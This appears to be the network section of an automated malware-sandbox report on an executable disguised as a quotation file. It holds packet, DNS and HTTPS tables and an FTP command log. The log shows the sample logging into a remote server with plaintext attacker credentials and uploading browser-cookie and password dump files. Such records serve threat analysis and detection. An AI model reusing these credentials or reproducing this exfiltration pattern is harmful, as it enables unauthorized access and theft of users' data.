Sep 27, 2024 13:14:14.032439947 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.032458067 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.032468081 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.032494068 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.032686949 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.032717943 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.032747030 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.032774925 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.032797098 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.033559084 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.033588886 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.033615112 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.033617020 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.033646107 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.033647060 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.033673048 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.033673048 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.033704042 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.033727884 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037528992 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037556887 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037611008 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037616014 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037643909 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037683964 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037698984 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037728071 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037755013 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037782907 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037796974 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037815094 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037846088 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.037868977 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.037899017 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.038686991 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.038820982 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.038849115 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.038875103 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.038904905 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042546988 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042752028 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042779922 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042864084 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042890072 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.042959929 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.043006897 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.043034077 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.043436050 CEST | 62089 | 49792 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.043493986 CEST | 49792 | 62089 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.053566933 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.053886890 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.058950901 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.068937063 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.334882975 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.335005045 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.339932919 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.443470001 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.443749905 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.448733091 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.713192940 CEST | 21 | 49791 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.756432056 CEST | 49791 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.776681900 CEST | 21 | 49790 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.818948030 CEST | 49790 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:14:14.831434011 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:14:14.881442070 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 27, 2024 13:10:02.280484915 CEST | 62984 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 27, 2024 13:10:02.308217049 CEST | 53 | 62984 | 1.1.1.1 | 192.168.2.4 |
Sep 27, 2024 13:10:06.803459883 CEST | 61284 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 27, 2024 13:10:07.075886011 CEST | 53 | 61284 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 27, 2024 13:10:02.280484915 CEST | 192.168.2.4 | 1.1.1.1 | 0xafb2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 27, 2024 13:10:06.803459883 CEST | 192.168.2.4 | 1.1.1.1 | 0xd8ab | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
Sep 27, 2024 13:10:02.308217049 CEST | 1.1.1.1 | 192.168.2.4 | 0xafb2 | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Sep 27, 2024 13:10:07.075886011 CEST | 1.1.1.1 | 192.168.2.4 | 0xd8ab | No error (0) | 110.4.45.197 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49733 | 104.26.12.205 | 443 | 2756 | C:\Users\user\Desktop\rQuotation3200025006.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-27 11:10:03 UTC | 155 | OUT | |
2024-09-27 11:10:03 UTC | 211 | IN | |
2024-09-27 11:10:03 UTC | 11 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49740 | 104.26.12.205 | 443 | 7616 | C:\Users\user\AppData\Roaming\pBBqGOzrz.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-27 11:10:13 UTC | 155 | OUT | |
2024-09-27 11:10:13 UTC | 211 | IN | |
2024-09-27 11:10:13 UTC | 11 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49748 | 104.26.12.205 | 443 | 8012 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-27 11:10:20 UTC | 155 | OUT | |
2024-09-27 11:10:21 UTC | 211 | IN | |
2024-09-27 11:10:21 UTC | 11 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49755 | 104.26.12.205 | 443 | 7188 | C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-27 11:10:27 UTC | 155 | OUT | |
2024-09-27 11:10:27 UTC | 211 | IN | |
2024-09-27 11:10:27 UTC | 11 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Sep 27, 2024 13:10:08.907953024 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:08.908003092 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:08.908032894 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:08.908216000 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:10:09.235133886 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:10:09.235284090 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:10:09.609087944 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:10:09.939069033 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:10:09.942521095 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PWD |
Sep 27, 2024 13:10:10.269857883 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location |
Sep 27, 2024 13:10:10.270051003 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I |
Sep 27, 2024 13:10:10.596981049 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Sep 27, 2024 13:10:10.599124908 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:10.925662041 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,209,190) |
Sep 27, 2024 13:10:10.933353901 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_08_10_04.txt |
Sep 27, 2024 13:10:11.762018919 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:12.151508093 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.389 seconds (measured here), 8.42 Kbytes per second |
Sep 27, 2024 13:10:12.152465105 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:12.479223013 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,210,26) |
Sep 27, 2024 13:10:12.484707117 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_14_38_12.txt |
Sep 27, 2024 13:10:13.321419954 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:13.884481907 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred |
Sep 27, 2024 13:10:13.885103941 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred |
Sep 27, 2024 13:10:15.600683928 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:15.600987911 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:10:15.931091070 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:10:15.935343027 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:10:16.301481962 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:10:16.631720066 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:10:16.631902933 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PWD |
Sep 27, 2024 13:10:16.961774111 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location |
Sep 27, 2024 13:10:17.045949936 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I |
Sep 27, 2024 13:10:17.376188993 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Sep 27, 2024 13:10:17.382038116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:17.711987972 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,208,86) |
Sep 27, 2024 13:10:17.718048096 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_13.html |
Sep 27, 2024 13:10:19.570696115 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:19.570862055 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:19.571049929 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:19.571302891 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:19.901110888 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 1.341 seconds (measured here), 258.03 bytes per second |
Sep 27, 2024 13:10:20.202588081 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:21.281092882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56) |
Sep 27, 2024 13:10:21.284106016 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56) |
Sep 27, 2024 13:10:21.284137011 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,234,56) |
Sep 27, 2024 13:10:21.341022015 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_38_41.txt |
Sep 27, 2024 13:10:22.180212975 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:22.513676882 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.334 seconds (measured here), 9.82 Kbytes per second |
Sep 27, 2024 13:10:22.516904116 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:22.701957941 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:22.702133894 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:10:22.847029924 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,254,162) |
Sep 27, 2024 13:10:22.852849007 CEST | 49741 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_16_16_58.txt |
Sep 27, 2024 13:10:23.032072067 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:10:23.032488108 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:10:23.385102034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:10:23.682950020 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:23.715152979 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:10:23.715291977 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PWD |
Sep 27, 2024 13:10:24.018543005 CEST | 21 | 49741 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred |
Sep 27, 2024 13:10:24.044948101 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location |
Sep 27, 2024 13:10:24.045090914 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I |
Sep 27, 2024 13:10:24.374522924 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Sep 27, 2024 13:10:24.374686003 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:24.704941034 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,201,41) |
Sep 27, 2024 13:10:24.710805893 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_21.html |
Sep 27, 2024 13:10:25.537411928 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:25.868066072 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.331 seconds (measured here), 1.02 Kbytes per second |
Sep 27, 2024 13:10:25.892936945 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:26.223146915 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,255,81) |
Sep 27, 2024 13:10:26.228996992 CEST | 49751 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_12_59_12.txt |
Sep 27, 2024 13:10:27.066812992 CEST | 21 | 49751 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:29.133990049 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Sep 27, 2024 13:10:29.134206057 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my |
Sep 27, 2024 13:10:29.461889982 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required |
Sep 27, 2024 13:10:29.462064028 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$ |
Sep 27, 2024 13:10:29.822135925 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Sep 27, 2024 13:10:30.154460907 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command |
Sep 27, 2024 13:10:30.154666901 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PWD |
Sep 27, 2024 13:10:30.482898951 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location |
Sep 27, 2024 13:10:30.483570099 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I |
Sep 27, 2024 13:10:30.811661959 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Sep 27, 2024 13:10:30.812300920 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:31.140465021 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,217,178) |
Sep 27, 2024 13:10:31.146662951 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-849224_2024_09_27_07_10_27.html |
Sep 27, 2024 13:10:31.976399899 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:32.303776026 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.336 seconds (measured here), 1.01 Kbytes per second |
Sep 27, 2024 13:10:32.323329926 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:32.656864882 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,235,22) |
Sep 27, 2024 13:10:32.663347960 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-849224_2024_09_27_13_09_18.txt |
Sep 27, 2024 13:10:33.498569965 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:33.828073978 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.328 seconds (measured here), 9.98 Kbytes per second |
Sep 27, 2024 13:10:33.828564882 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | PASV |
Sep 27, 2024 13:10:34.156984091 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,238,235) |
Sep 27, 2024 13:10:34.162580967 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_15_28_13.txt |
Sep 27, 2024 13:10:34.992522955 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection |
Sep 27, 2024 13:10:35.323205948 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred |
